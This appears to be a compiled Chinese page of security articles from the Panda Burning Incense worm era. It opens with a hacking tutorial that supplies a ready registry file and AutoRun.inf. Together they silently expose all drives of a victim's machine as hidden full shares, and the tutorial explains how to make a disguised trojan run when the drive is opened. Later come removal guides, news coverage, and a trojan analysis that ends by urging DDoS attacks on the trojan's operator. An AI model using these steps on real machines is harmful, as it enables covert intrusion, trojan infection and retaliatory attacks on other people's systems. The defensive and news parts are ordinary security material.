请大家注意：保存的文件名必须是“AutoRun.inf”，编制好的Autorun.inf文件和图标文件一定要放在硬盘根目录下。更进一步，如果你的某个硬盘内容暂时比较固定的话，不妨用Flash做一个自动播放文件，再编上“Autorun”文件，那你就有最酷、最个性的硬盘了。

到这儿还没有完。大家知道，在一些光盘放入后，我们在其图标上单击鼠标右键，还会产生一个具有特色的目录菜单，如果能对着我们的硬盘点击鼠标右键也产生这样的效果，那将更加的有特色。其实，光盘能有这样的效果也仅仅是因为在AutoRun.inf文件中有如下两条语句：


shell\标志＝显示的鼠标右键菜单中内容

shell\标志\command＝要执行的文件或命令行


所以，要让硬盘具有特色的目录菜单，在AutoRun.inf文件中加入上述语句即可，示例如下：


shell\1=天若有情天亦老

shell\1\command\=notepad ok.txt


保存完毕，按F5键刷新，然后用鼠标右键单击硬盘图标，在弹出菜单中会发现“天若有情天亦老”，点击它，会自动打开硬盘中的“ok.txt”文件。注意：上面示例假设“ok.txt”文件在硬盘根目录下，notepad为系统自带的记事本程序。如果要执行的文件为直接可执行程序，则在“command\”后直接添加该执行程序文件名即可。



二、实例

下面就举个例子：如果你扫到一台开着139共享的机器，而对方只完全共享了D盘，我们要让对方的所有驱动器都共享。首先编辑一个注册表文件，打开记事本，键入以下内容：


REGEDIT4
'此处一定要空一行
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\C$]
"Path"="C:"
"Remark"=""
"Type"=dword:00000000
"Flags"=dword:00000302
"Parmlenc"=hex:
"Parm2enc"=hex:

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\D$]
"Path"="D:"
"Remark"=""
"Type"=dword:00000000
"Flags"=dword:00000302
"Parmlenc"=hex:
"Parm2enc"=hex:

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\C$]
"Path"="E:"
"Remark"=""
"Type"=dword:00000000
"Flags"=dword:00000302
"Parmlenc"=hex:
"Parm2enc"=hex:


以上我只设置到E盘，如果对方有很多逻辑盘符的请自行设置。将以上部分另存为Share.reg文件备用。要特别注意REGEDIT4为大写且顶格书写，其后要空上一行，在最后一行记得要按一次回车键。

然后打开记事本，编制一个AutoRun.inf文件，键入以下内容：


[AutoRun]
Open=regedit/s Share.reg //加/s参数是为了导入时不会显示任何信息


保存AutoRun.inf文件。将Share.reg和AutoRun.inf这两个文件都复制到对方的D盘的根目录下，这样对方只要双击D盘就会将Share.reg导入注册表，这样对方电脑重启后所有驱动器就会都完全共享出来。

如果想让对方中木马，只要在AutoRun.inf文件中，把“Open=Share.Reg”改成“Open=木马服务端文件名”，然后把AutoRun.inf和配置好的木马服务端一起复制到对方D盘的根目录下，这样不需对方运行木马服务端程序，而只需他双击D盘就会使木马运行！这样做的好处显而易见，那就是大大的增加了木马运行的主动性！须知许多人现在都是非常警惕的，不熟悉的文件他们轻易的不会运行，而这种方法就很难防范了。

要说明的是，给你下木马的人不会那么蠢的不给木马加以伪装，一般说来，他们会给木马服务端文件改个名字，或好听或和系统文件名很相像，然后给木马换个图标，使它看起来像TXT文件、ZIP文件或图片文件等，，最后修改木马的资源文件使其不被杀毒软件识别（具体的方法可以看本刊以前的文章），当服务端用户信以为真时，木马却悄悄侵入了系统。其实，换个角度理解就不难了——要是您给别人下木马我想你也会这样做的。以上手段再辅以如上内容的AutoRun.inf文件就天衣无缝了！

三、防范方法

共享分类完全是由flags标志决定的，它的键值决定了共享目录的类型。当flags=0x302时，重新启动系统，目录共享标志消失，表面上看没有共享，实际上该目录正处于完全共享状态。网上流行的共享蠕虫，就是利用了此特性。如果把"Flags"=dword:00000302改成"Flags"=dword:00000402，就可以看到硬盘被共享了，明白了吗？秘密就在这里！

以上代码中的Parmlenc、Parm2enc属性项是加密的密码，系统在加密时采用了8位密码分别与“35 9a 4b a6 53 a9 d4 6a”进行异或运算，要想求出密码再进行一次异或运算，然后查ASCII表可得出目录密码。在网络软件中有一款软件就利用该属性进行网络密码破解的，在局域网内从一台机器上可以看到另一台计算机的共享密码。

利用TCP/IP协议设计的NethackerⅡ软件可以穿过Internet网络，找到共享的主机，然后进行相应操作。所以当您通过Modem上网时，千万要小心，因为一不小心，您的主机将完全共享给对方了。

解决办法是把


HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan



下面的“C$”、“D$”、“E$”等删掉。然后删除windows\system\下面的Vserver.vxd删除，它是Microsoft网络上的文件与打印机共享虚拟设备驱动程序，再把

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\



下的Vserver键值删掉，就会很安全了。
另外，关闭硬盘AutoRun功能也是防范黑客入侵的有效方法之一。具体方法是在“开始”菜单的“运行”中输入Regedit，打开注册表编辑器，展开到


HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Exploer



主键下，在右侧窗格中找到“NoDriveTypeAutoRun”，就是这个键决定了是否执行CDROM或硬盘的AutoRun功能。
双击“NoDriveTypeAutoRun”，在默认状态下（即你没有禁止过AutoRun功能），在弹出窗口中可以看到“NoDriveTypeAutoRun”默认键值为95,00,00,00。其中第一个值“95”是十六进制值，它是所有被禁止自动运行设备的和。将“95”转为二进制就是10010101，其中每位代表一个设备，Windows中不同设备会用如下数值表示：




设备名称　　　　 第几位 值 设备用如下数值表示 设备名称含义
DKIVE_UNKNOWN　　 0　　1　　01h　　　　　　 不能识别的设备类型
DRIVE_NO_ROOT_DIR 1　　0　　02h　　　　　　 没有根目录的驱动器(Drive without root 　
　　　　　　　　　　　　　　　　　　　　　　　 directory)
DRIVE_REMOVABLE　　2　　1　　04h　　　　　　 可移 动驱动器(Removable drive)
DRIVE_FIXED　　　　3　　0　　08h　　　　　　 固定的驱动器(Fixed drive)
DRIVE_REMOTE　　 4　　1　　10h　　　　　　 网络驱动器(Network drive)
DRIVE_CDROM　　　　5　　0　　20h　　　　　　 光驱(CD-ROM)　　
DRIVE_RAMDISK　　 6　　0　　40h　　　　　　 RAM磁盘(RAM Disk)
保留　　　　　　 7　　1　　80h　　　　　　 未指定的驱动器类型(Not yet
specified drive disk)


在上面所列的表中值为“0”表示设备运行，值为“1”表示该设备不运行（默认情况下，Windows禁止80h、10h、4h、01h这些设备自动运行，这些数值累加正好是十六进制的95h，所以NoDriveTypeAutoRun”默认键值为95,00,00,00）。

由上面的分析不难看出，在默认情况下，会自动运行的设备是DRIVE_NO_ROOT_DIR、DRIVE_FIXED、DRIVE_CDROM、DRIVE_RAMDISK这四个保留设备，所以要禁止硬盘自动运行AutoRun.inf文件，就必须将DRIVE_FIXED的值设为1，这是因为DRIVE_FIXED代表固定的驱动器，即硬盘。这样一来，原来的10010101（在表中“值”列中由下向上看）就变成了二进制的10011101，转为十六进制为9D。现在，将“NoDriveTypeAutoRun”的键值改为9D,00,00,00后关闭注册表编辑器，重启电脑后就会关闭硬盘的AutoRun功能。

如果你看明白了，那你肯定知道该怎样禁止光盘AutoRun功能了，对！就是将DRIVE_CDROM设为1，这样“NoDriveTypeAutoRun”键值中的第一个值就变成了10110101，也就是十六进制的B5。将第一个值改为B5后关闭注册表编辑器，重启电脑后就会关闭CDROM的Autorun功能。如果仅想禁止软件光盘的AutoRun功能，但又保留对CD音频碟的自动播放能力，这时只需将“NoDriveTypeAutoRun”的键值改为：BD,00,00,00即可。

如果想要恢复硬盘或光驱的AutoRun功能，进行反方向操作即可。

事实上，大多数的硬盘根目录下并不需要AutoRun.inf文件来运行程序，因此我们完全可以将硬盘的AutoRun功能关闭，这样即使在硬盘根目录下有AutoRun.inf这个文件，Windows也不会去运行其中指定的程序，从而可以达到防止黑客利用AutoRun.inf文件入侵的目的。

除此以外，我们还应让Windows能显示出隐藏的共享。大家都知道，在Windows 9X中设置共享时，通过在共享名后加上“$”这个符号，可使共享隐藏。比如，我们给一个名为share的计算机的C盘设置共享时，只要将其共享名设为C$。这样我们将看不到被共享的C盘，只有通过输入该共享的确切路径，才能访问此共享。不过我们只要用将电脑中的msnp32.dll文件稍做修改。就可以让Windows显示出隐藏的共享。

由于在Windows下msnp32.dll会被调用，不能直接修改此文件，所以第一步我们要复制msnp32.dll到C盘下并改名为msnp32，msnp32.dll在C:\Windows\system文件夹下。运行UltraEdit等十六进制文件编辑器打开msnp32，找到“24 56 E8 17”（位于偏移地址00003190～000031A0处），找到后将“24”改为“00”，然后保存，关闭UltraEdit。重启计算机进入DOS模式，在命令提示符下输入copy c:\msnp32.dll c:\Windows\system\msnp32.dll，重启进入Windows，现在双击share就能看见被隐藏的共享了。

最后要提醒大家利用TCP/IP协议设计的NethackerⅡ等黑客软件可以穿过Internet网络，找到共享的主机，然后进行相应操作。所以当您通过Modem上网时，千万要小心，因为一不小心，您的主机将完全共享给对方了。防范这类事情发生的方法无非是经常检查系统，给系统打上补丁，经常使用反黑杀毒软件，上网时打开防火墙，注意异常现象，留意AutoRun.inf文件的内容，关闭共享或不要设置为完全共享，且加上复杂的共享密码。

声明：本文的目的是使大家能清楚地了解网上流行的黑客手段，增强自己的防护意识，因此请大家不要用本文的方法去干违法的事情，切记：己所不欲，勿施于人！

评论：“熊猫烧香”究竟在祈祷什么？

评论：“熊猫烧香”究竟在祈祷什么？

　　“熊猫烧香”真乃我国信息安全界的一大“国宝”,从另一个角度来说,它至少让大家明白了中国网民的网络安全和反病毒的基础知识和意识有待提高,也让各大病毒厂商从自己吹捧的各项专利技术和各种“国际领先水平”的头衔中彻底醒悟了过来.

　　“熊猫烧香”病毒红了,在它三根香的虔诚祈祷下,不到数月便红遍了整个中国,上了CCTV,也让自己的大名摆在了瑞星,江民,金山以及各大信息安全论坛和各类电脑技术交流网站的“头版头条”,就连我们的国宝大熊猫也未曾在IT界有过这等“殊荣”,显示出一派“满城尽烧熊猫香”的壮观场景.

　　如果抛开法律和道德层面,单从技术角度来分析的话.“熊猫烧香”真乃我国信息安全界的一大“国宝”,从另一个角度来说,它至少让大家明白了中国网民的网络安全和反病毒的基础知识和意识有待提高,也让各大病毒厂商从自己吹捧的各项专利技术和各种“国际领先水平”的头衔中彻底醒悟了过来.拥有众多的反病毒专利技术和“国际领先水平”的杀毒软件在可爱的“熊猫”面前是如此地不堪一击,往往总是在病毒出尽了风头,危害了数十万用户之后,“专杀工具”才终于姗姗来迟.有人说是“非典”成就了如今一整套的完善卫生预警体系.那么我们可不可以类似地说,正是因为“熊猫烧香”、“威金”,“魔波”等一系列病毒,才使得脆弱的网络变得更加的坚固,才使得人们的防范意识和防范常识更加的深入人心.况且“熊猫烧香”在目前看来,并不是为了经济利益,与各种金钱至上所驱使的流氓软件,诈骗的QQ尾巴相比,或许它烧香只是为了祈祷人们更好的防范网络的安全.

　　“熊猫烧香”本身 “熊猫烧香”是一个传染型的DownLoad,使用Delphi编写,从技术上来说它并没有什么创新之处,却借鉴很多经典病毒,木马甚至是流氓软件的技术优点.综合成了一个拥有可爱的图标却让人闻之色变的病毒.任何一个技术单一拿出来杀毒软件都能应付,但是综合到一起这只“熊猫”却反过来让众多杀毒软件成了它“烧香”时的拜忌品.它的运行原理并不复杂,无非是“复制文件到系统目录和根目录”,”添加注册表启动项“,“利用微软自动播放功能运行”,“针对计算机本身攻击弱口令”,“利用IE浏览器漏洞在网页文件中添加脚本代码”等等一些并不算“最新先进”的技术.但就是这些“不算最新”的技术却在全国上下揭起了一股“烧香”热潮.

　　由此说明,我们有大部分网民缺乏最基本的网络安全防范知识,也缺少良好的上网习惯.如果用户能及早打好系统补丁,为系统管理帐户设置复杂无规律的密码,关掉一些不需用到却存在安全隐患(如139,445等)的端口,,同时关闭非“系统必须”的“自动播放”功能.对.gho 的系统备份文件设置为“只读”,那么“熊猫烧香”也不至于流传这么广,这么快,也不至于很多企事业单位整个局域网电脑都集体“烧香” 再来看看我们的各大杀毒软件厂商在这个“金钱至上”的年代,“熊猫烧香”成了众杀毒软件的卖点,或者说成了它促销的一个工具,自身的反病毒技术没有突破性的进步,却大肆鼓吹用户升级病毒库去购买正版,鼓吹企业购买企业版网络级杀毒软件.

　　事实上,在许多条件下,杀毒软件在病毒面前永远保持着无能为力.防毒的本身在于良好的系统操作习惯以及对网络的不信任态度.结果是:“熊猫烧香”流行了,用户受损失了,而杀毒软件厂商却笑了:“今年的利润指标可以提前完成了……”防病毒厂商受经济利益所驱使的升级鼓吹,在这只可爱的熊猫图标面前终于漏出了本来的面目. 最后来谈谈“熊猫烧香”的主人-病毒的作者单从技术角度而言,可称得上是一个真正的顶级黑客,对网络,系统,程序设计等知识的综合运用已达到炉火纯青.与此相对比的是,很多无知的人整天开着别人开发出来的扫描工具,一阵乱扫,偶尔扫到了一二个漏洞,控制了一二台肉鸡或破坏了某网站上的一二个网页,就在论坛上高调的宣扬自己的“战果”,动不动就以黑客自居.更有甚者,为了宣扬自己在“网络江湖”中的威望,弄出一大堆的“黑客排行榜”或“顶级黑客一览表”来,然后把自己也位列其中……我想这类人在“熊猫烧香”的技术含量面前应该感到汗颜和反思.后记:据说“熊猫烧香”的作者决定以后不再对它进行更新了.至于“熊猫”虔诚地“烧香”所代表真正含义,或许只有它的作者知道,或许是在祈祷,或许……如果还有或许的话…

共享成果：杀熊猫烧香100％成功绝招

　　瑞星1月14号以后的病毒库都能杀，而且很灵。但瑞星的程序会被熊猫关掉。

　　杀毒具体方法(100%成功)。注意!一定要看完完整的一步再进行，因为一旦断开，整步都要重做!

　　1、右键点击托盘里的瑞星防火墙图标，选择“系统状态”，然后马上用右键点击任务栏中的防火墙窗口按钮，弹出窗口控制菜单，这样就可以锁住窗口，使其不被关闭。找出“熊猫”的进程，记下程序名。现在可以把菜单点掉了，你会发现瑞星的窗口马上被关了。没事，现在不管它。

　　2、打开“任务管理器”(Ctrl+Alt+Del)。在窗口出来时马上点任务栏锁住它，然后打开“进程”标签(如果已经打开就跳过这一步)。然后按住标题栏锁住它。准备一下，迅速松开标题栏，按下刚才找到的“熊猫”的首字母，再按住标题栏。重复数次，直到选中“熊猫”。松开标题栏，马上按键盘上的“右键快捷键(右Ctrl左边的那个画着菜单的键)”、然后按“T”、“Y”，结束“熊猫”的进程树!

　　3、至此，已经成功90%了，你可以稍稍放松一下。打开瑞星杀毒软件和防火墙，升级到最新版本后(可能要重启，重启后只能重复1、2了，但如果你是1月14号以后的病毒库就不用升级了)，打开防火墙主程序的“启动选项”，显示所有启动项(什么应用程序劫持项、驱动程序的)，删掉熊猫的键值。然后开着防火墙、监控中心进行整机杀毒!(包括引导区、内存、邮件。可以不断网，因为病毒已经进不来了)。

　　4、杀完毒，看一看是不是几百个“Worm.Nimaya.W”全在网页里面?怪不得一开网际快车就重新中毒呢。重启电脑，再来一遍开机扫描，确定无毒，电脑也就无毒了。

教你手动清除“熊猫烧香”以及变种

作者： 王智刚

　　操作前强烈建议先做一个干净的系统，做好会不要进行任何多余操作，按照我说的一步一步的来!

　　1.下载专杀工具，扫描一遍，注意，必须这两个都扫一遍，因为网上的专杀太多，原理不尽相同，这两个配合使用基本可以保证病毒全部清除，被病毒感染的EXE文件也会被复原

　　2.开始→搜索→文件或文件夹→搜索硬盘上的*.htm ,*.html,*.php,*.asp,*.jsp,*.aspx后缀的文件,全部删除掉。如果清不掉的就用命令行清除，开始→运行→CMD→输入del x:*.htm /f/s/q/a 这里的X指的是你的盘符，你有几个盘就清除几次，fsqa指的是无条件删除盘符下所有属性的该后缀文件，包括了隐含文件，和系统文件。删除完htm文件后，依次再删除html,php,asp,aspx。

　　(注意：如果你的资料包含这些后缀的文件，那你就不能简单的做批删除操作了，最好的办法是你去下载一个dreamwaver，然后把每个文件源码的末尾部分被修改的部分改回，这里不多说，去摆渡一下就知道!这了采用的批删除操作是针对一般用户而言，而且这样做并不会导致你收藏的网页丢失)

　　3.右键打开你的D盘，找到System Volume Information，(如果找不到，说明你的隐含文件是不显示的，那找到注册表的这个位置HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]

　　"CheckedValue"=dword:00000000，把最后的00000000 改为00000001即可。)进去，手动删除除change.log外的所有文件。然后依次对其他盘进行操作。(因为这个位置的病毒会在重启后再生，而很多专杀又无法机械的清除该位置的病毒，所以这个步骤非常重要。)

　　4.如果你还没有做新系统，那么现在需要修改注册表的启动项HKEY-LOCAL-MACHINE \SOFTWARE\Microsoft\Windows\ CurrentVersion\Run 把右边的键全部删除。

　　5.这个步骤不是很重要，也可以不做。再次利用批删除功能清除各个分区残留文件desktop_.ini。如果你感觉看到他就心烦那还是清除掉的好。del x:*.desktop_.ini /f/s/q/a 。大功告成!

　　操作的过程中，不要直接双击任何分区，不要运行除专杀外任何EXE，RAR文件，还有最还看完帖子断开网再操作。熊猫其实也没有网上传的那么神，它相当于几个病毒的合体而已，只要操作的时候细心就一定可以彻底告别这个病毒。

　　补充：

　　1.对于ghost镜象被删除的朋友，建议你使用一下easyrecovery恢复一下你的镜象文件，前提是你对储存*.gho的分区未进行大规模的写操作，如果这样你就试一下这个恢复软件，效果不错。

　　2.有朋友反映他的任务管理器注册表已经打不开，对于这些朋友我建议你先做个干净系统再来杀毒，如果不重做系统操作起来难度是很大的，而且中过熊猫烧香的系统会被打开许多后门，这些后门会使你不断中新病毒，即使不重做系统杀完毒你的系统也已经是千疮百孔了。

　　3.还有不少朋友嫌杀毒麻烦，而且杀不干净一不小心又会复发，我已经研究了该病毒以及常见变种的原理，我争取尽快编写一个清除该病毒的批处理脚本，如果你嫌麻烦不妨可以先等一下。：)

揭秘熊猫烧香病毒肆虐内幕(图)

作者： 孙尚伟



图：感染后的文件图标会变成“熊猫烧香”图案
　　新年伊始“熊猫烧香”病毒愈演愈烈

　　-“熊猫烧香”病毒档案

　　追杀目标：Worm.WhBoy.h

　　中 文 名：“熊猫烧香”

　　病毒长度：可变

　　病毒类型：蠕虫

　　危害等级：★★★★

　　影响平台：Win 9X/ME/NT/2000/XP/2003

　　典型表现：

　　“熊猫烧香”是一个由Delphi工具编写的蠕虫，终止大量的反病毒软件和防火墙软件进程。病毒会删除扩展名为gho的文件，使用户无法使用ghost软件恢复操作系统。“熊猫烧香”感染系统的.exe、.com、.pif、.src、.html、.asp文件，添加病毒网址，导致用户一打开这些网页文件，IE就会自动连接到指定的病毒网址中下载病毒。在硬盘各个分区下生成文件autorun.inf和setup.exe，可以通过U盘和移动硬盘等方式进行传播，并且利用Windows系统的自动播放功能来运行，搜索硬盘中的.exe可执行文件并感染，感染后的文件图标变成“熊猫烧香”图案。“熊猫烧香”还可以通过共享文件夹、系统弱口令等多种方式进行传播。

日前，电脑用户张先生气愤地告诉记者：“今天早晨一打开电脑，我就快晕了。进入系统后，许多应用程序无法使用，重装软件后，不久又不能使用。更奇怪的是发现电脑中所有的.exe可执行文件全部变成小熊猫举着三根香的模样，而且系统运行异常缓慢，非常郁闷。”据记者从国内几家杀毒公司了解到，近期，一个叫“熊猫烧香”(Worm.WhBoy.h)的病毒把电脑用户折腾得苦不堪言。在人们心目中，“熊猫”这个国宝似乎不再可爱，而成了人人喊打的过街老鼠。据国内的病毒专家介绍，“熊猫烧香”蠕虫不但对用户系统进行破坏，导致大量应用软件无法使用，而且还可删除扩展名为gho的所有文件，造成用户的系统备份文件丢失，从而无法进行系统恢复。此外，该病毒还能终止大量反病毒软件进程，大大降低用户系统的安全性。

　　三大原因导致“熊猫烧香”肆虐

　　近日，“熊猫烧香”病毒泛滥成灾，已经到了天怒人怨的地步。据悉，由于多家著名网站遭到此类病毒攻击而相继被植入病毒。由于这些网站的浏览量非常大，致使此次“熊猫烧香”病毒的感染范围非常广。

　　据瑞星反病毒专家介绍，“熊猫烧香”其实是“尼姆亚”病毒的新变种，最早出现在2006年的11月。由于它一直在不停地进行变种，而且该病毒会在中毒电脑中所有的网页文件尾部添加病毒代码，因此，一旦一些网站编辑人员的电脑被该病毒感染，网站编辑在上传网页到网站后，就会导致所有浏览该网页的计算机用户也被感染上该病毒。

　　同时，据金山毒霸反病毒中心表示，“熊猫烧香”除了通过网站带毒感染用户之外，此病毒还会通过QQ最新漏洞传播自身，通过网络文件共享、默认共享、系统弱口令、U盘及移动硬盘等多种途径传播。而局域网中只要有一台机器感染，就可以瞬间传遍整个网络，甚至在极短时间之内就可以感染几千台计算机，严重时可以导致网络瘫痪。中毒症状表现为电脑中所有可执行的.exe文件都变成了一种怪异的图案，该图案显示为“熊猫烧香”，继而系统蓝屏、频繁重启、硬盘数据被破坏等，严重的整个公司局域网内所有电脑会全部中毒。

　　对此，江民反病毒专家何公道分析认为：导致病毒快速传播目前存在三大原因。一是大量的企业用户使用国外杀毒软件，而国外杀毒软件对于此类国产病毒响应速度特别慢。二是由于被种植“熊猫烧香”病毒网站的点击量的全球排名均在前300名之列，而当一部分网站编辑本身机器感染了病毒之后，当他们把受感染文件上传到服务器后，访问者点击此类受感染网页即中毒，因此，该病毒才会得以迅速传播。三是其病毒具有极强的变种能力，仅从2006年11月至年底短短一个多月的时间，该病毒就变种将近30余次，因此在许多用户疏于防范而没有更新杀毒软件时，该病毒即可借机迅速传播。

　　新年伊始“熊猫烧香”破坏继续加剧

　　据了解，江民科技发布的2006年计算机病毒疫情显示，“熊猫烧香”(“威金”病毒变种)已成为2006年计算机病毒最大威胁。截至去年12月份，已有超过50万台计算机受此病毒感染，而受害企业用户更是达到上千家，多数企业业务因此停顿，直接和间接损失无法估量，病毒疫情十分严重。

　　近日据记者从金山毒霸反病毒中心获取的最新消息：“熊猫烧香”(Worm.WhBoy.h)病毒目前再次进入急速变种期，从元旦至今，仅半个多月，“熊猫烧香”变种数已高达50多个，并且其感染用户的数量也在不断扩大。据金山毒霸客户服务中心初步统计，目前感染“熊猫烧香”病毒的个人用户已经高达几百万，企业用户感染数更是成倍上升。特别是在近一周内，金山毒霸客服中心有关熊猫烧香的日咨询量已高达73%，而感染用户主要以北京、广州、上海等大型城市为主。

　　另据金山毒霸反病毒专家戴光剑指出，当前由于大部分感染了“熊猫烧香”的用户只能被动下载一些相关的专杀工具或杀毒软件进行查杀，而由于熊猫烧香变种多，传播速度快，一旦用户没能及时升级杀毒软件或专杀工具，查杀效果将大打折扣。所以如何彻底将“熊猫烧香”拦截于用户的电脑之外，成为各大杀毒厂商目前急需解决的问题。

最全面的“熊猫烧香”整体解决方案

　　近期，“熊猫烧香”病毒无疑成了互联网最热门的关键字了，网上也能找到很多个有关熊猫烧香病毒的解决办法。这些方法都显得不尽完美，再加上熊猫的变种很多，有效性就更加大打折扣了。为此，记者通过对国内几家杀毒软件公司的采访，整理出了一套相对完整的解决方案供大家参考。对于已经感染“熊猫烧香”病毒的用户，可以采用以下几种方式对该病毒进行查杀。

　　★金山

　　金山毒霸2007对“熊猫烧香”已经具备免疫能力，金山毒霸反病毒专家建议及时安装正版金山毒霸并升级到最新版本进行查杀。在服务期内的毒霸用户，将会通过金山毒霸的主动实时升级功能，自动升级到最新版本，实现对“熊猫烧香”的免疫。对于没有安装杀毒软件的电脑用户，可以登录到http://www.mydown.com/soft/utilitie/antivirus/331/414831.shtml免费下载金山的“熊猫烧香”专杀工具。

　　★江民

　　江民建议已安装江民杀毒软件的用户将杀毒软件升级到最新病毒库，并对电脑进行全盘查杀。未安装杀毒软件的用户，也可登录到http://www.mydown.com/soft/utilitie/antivirus/335/414835.shtml下载安装江民“熊猫烧香”专杀工具，可以有效清除病毒和修复被感染文件。

五招远离熊猫烧香骚扰

　　据金山毒霸反病毒中心表示，近期“熊猫烧香”的变种异常活跃，因此从目前至春节期间，该病毒还将会一直骚扰着电脑用户。虽然用户及时更新杀毒软件病毒库，并下载各杀毒软件公司提供的专杀工具，即可对“熊猫烧香”病毒进行查杀，但是如果能做到防患于未然岂不更好。为此，记者在采访中，还总结了以下五招预防措施，希望可以帮您远离“熊猫烧香”病毒的骚扰。

　　1.立即检查本机administrator组成员口令，一定要放弃简单口令甚至空口令，安全的口令是字母数字特殊字符的组合，自己记得住，别让病毒猜到就行。

　　修改方法：右键单击我的电脑，选择管理，浏览到本地用户和组，在右边的窗格中，选择具备管理员权限的用户名，单击右键，选择设置密码，输入新密码就行。

　　2.利用组策略，关闭所有驱动器的自动播放功能。

　　步骤：单击开始，运行，输入gpedit.msc，打开组策略编辑器，浏览到计算机配置，管理模板，系统，在右边的窗格中选择关闭自动播放，该配置缺省是未配置，在下拉框中选择所有驱动器，再选取已启用，确定后关闭。最后，在开始，运行中输入gpupdate，确定后，该策略就生效了。

　　3.修改文件夹选项，以查看不明文件的真实属性，避免无意双击骗子程序中毒。

　　步骤：打开资源管理器(按windows徽标键+E)，点工具菜单下文件夹选项，再点查看，在高级设置中，选择查看所有文件，取消隐藏受保护的操作系统文件，取消隐藏文件扩展名。

　　4.时刻保持操作系统获得最新的安全更新，不要随意访问来源不明的网站，特别是微软的MS06-014漏洞，应立即打好该漏洞补丁。

　　同时，QQ、UC的漏洞也可以被该病毒利用，因此，用户应该去他们的官方网站打好最新补丁。此外，由于该病毒会利用IE浏览器的漏洞进行攻击，因此用户还应该给IE打好所有的补丁。如果必要的话，用户可以暂时换用Firefox、Opera等比较安全的浏览器。

　　5.启用Windows防火墙保护本地计算机。同时，局域网用户尽量避免创建可写的共享目录，已经创建共享目录的应立即停止共享。

　　此外，对于未感染的用户，病毒专家建议，不要登录不良网站，及时下载微软公布的最新补丁，来避免病毒利用漏洞袭击用户的电脑，同时上网时应采用“杀毒软件+防火墙”的立体防御体系。

黑客攻防之与BT下载的捆马者的较量

黑客攻防之与BT下载的捆马者的较量

　　现在的时代，捆马成风，什么东西里都捆马。五花八门的方式都出来了，就连一个游戏也要捆马。我在BT之家看到场了一个抢滩登陆2006 就他的介绍看来是不错的。捆马的人自己敢声称：经KV2005把关无毒，说明他对自己的免杀的功力是很有自信的。下面，就让我们来一步步的揭开他的骗局。

　　下载得到抢滩登陆2006.exe的确KV2005下提示无毒，用瑞星金山全部提示无毒，用PEID检查为看上去没有问题，但是一个安装包怎么可能是Microsoft Visual C++ 6.0?一个安装包竟然要用vmprotect处理?这是为什么?要免杀吗?这就更加怀疑了。

　　下面开始和捆马者正面较量!

　　我开始把他想简单了，以为可以直接用安装包解开工具直接处理，没想到的是我的所有安装包解开工具都提示无法解开，原因我想应该是vmprotect改变了文件的一些结构，从而无法识别。好的，我们来简单的。直接运行安装包，不过要先记得拔掉网线。

　　这里提供一个好工具icesword 1.18 利用icesword 1.18的线程监控功能，我们可以轻易的发现马的一切动作。

　　我们运行他，什么也不要再点，直接来看，2006.exe就是安装包主文件，仔细看好了，2006.exe启动了一个2.tmp和3.tmp,然后就创建了awaress.cn文件。进而，awaress.cn创建了iexplorer.exe这个东西看起来象个网站，其实就是鸽子的主体文件，下面我们把他检测一下。通过virustotal检测我们可以看到，这个家伙用了nspack pe_patch两个加壳工具不过ewido/卡巴还是能查杀他。

　　木马已经进入了系统，下面我们把他抓出来，看看服务： 瞧，和他的主文件名一样，这个文件就是他释放出的马了。结合icesword可以看见红色的iexplorer.exe，即为木马的进程。木马已经抓出来了，下面就是对他处理处理。可以抓到后台的捆马的人，找出他的IP。然后嘛，拿出我们的强力攻击工具搞死他。哈哈 我个人习惯把文件改成DLL，这样一来可以防止误运行，又可以被PE工具检测。我们可以看到，是nspcak的加壳，可以进一步确认为NsPacK V3.7 -> LiuXingPing *的。

　　为了能够反向抓出捆马的人，我们首先来脱壳。用Ollydbg加再使用ESP定理，在0012ffc0上下memory access端点，我们回来到这里难道脱壳没有成功?不，这个捆马着加了两次NSPACK，同样的方法，我们解决问题，回来到这里。这里是捆马的家伙自己写的花指令，一路跟踪下去。我们最终会到达以下地方。从这里开始，所有的壳已经被解开开，作者还写好了Ultra String Reference，项目 864。

　　Address=004A2ED7 Disassembly=push Awarenes.004A2FD6 Text String=雨花石专版服务端安装成功!

　　哈哈，名字就在这里，我们等会再去看看，先解决反向连接的IP，我们来到这里：

　　堆栈 ss:[0012FF70]=00E63874 edx=00E62530, (ASCII "46C3BBBA4C00629EC81CAB4A1797E4FCA6F9B4B9A4B6171DD743F967A806141107 A05DFE0AD79C0D311361503EE75A3AC2CC096919737A72F340252EF6F00377CC910B5A0F41 243C773D542B3D61227F040B2EC6885484641D47B329E19EDFB40FE692E8DA4EE8D99158E7 D2230BA5DE94B7D6FB) 堆栈 ss:[0012FF6C]=00E63970, (ASCII "flkano.noip.cn") edx=00000000 堆栈 ss:[0012FF68]=00E6398C, (ASCII "8b4ca58172880bbb") edx=00000000 堆栈 ss:[0012FF64]=00E639AC, (ASCII "$(WinDir)\Awareness.cn") edx=00000000 堆栈 ss:[0012FF60]=00E6394C, (ASCII "C:\WINNT\Awareness.cn") edx=00E639AC, (ASCII "$(WinDir)\Awareness.cn") 堆栈 ss:[0012FF5C]=00E63CEC, (ASCII "Awareness.cn") edx=00000000 Awareness 管理卷影复制服务拍摄的软件卷影复制。

　　由以上几个方面的内容，很简单的就获得的全部的配置：

　　C:\>ping flkano.noip.cn Pinging flkano.noip.cn [202.110.91.221] with 32 bytes of data: Reply from 202.110.91.221: bytes=32 time=78ms TTL=112

　　捆马的人正在线呢。

　　我们要搞死他可以使用DDOS工具攻击他的*80断口，他的很快就会不上线了。

　　好了。我们还有一件事情没有做完。起先的那个游戏是个捆绑的版本，我们还要分离出无马的纯净版本。既然他是个捆绑机释放出的两个文件：2.tmp和3.tmp，其中2.tmp就是游戏的真正的安装文件，我们把他复制出来。再用icesword看看，我命名为了2.exe瞧，没有再产生新文件了吧，说明这个就是真正的游戏。这就是用PEID再次扫描的结果，确实是个安装包了。说明解包成功，我们获得了真正的纯净的安装包。

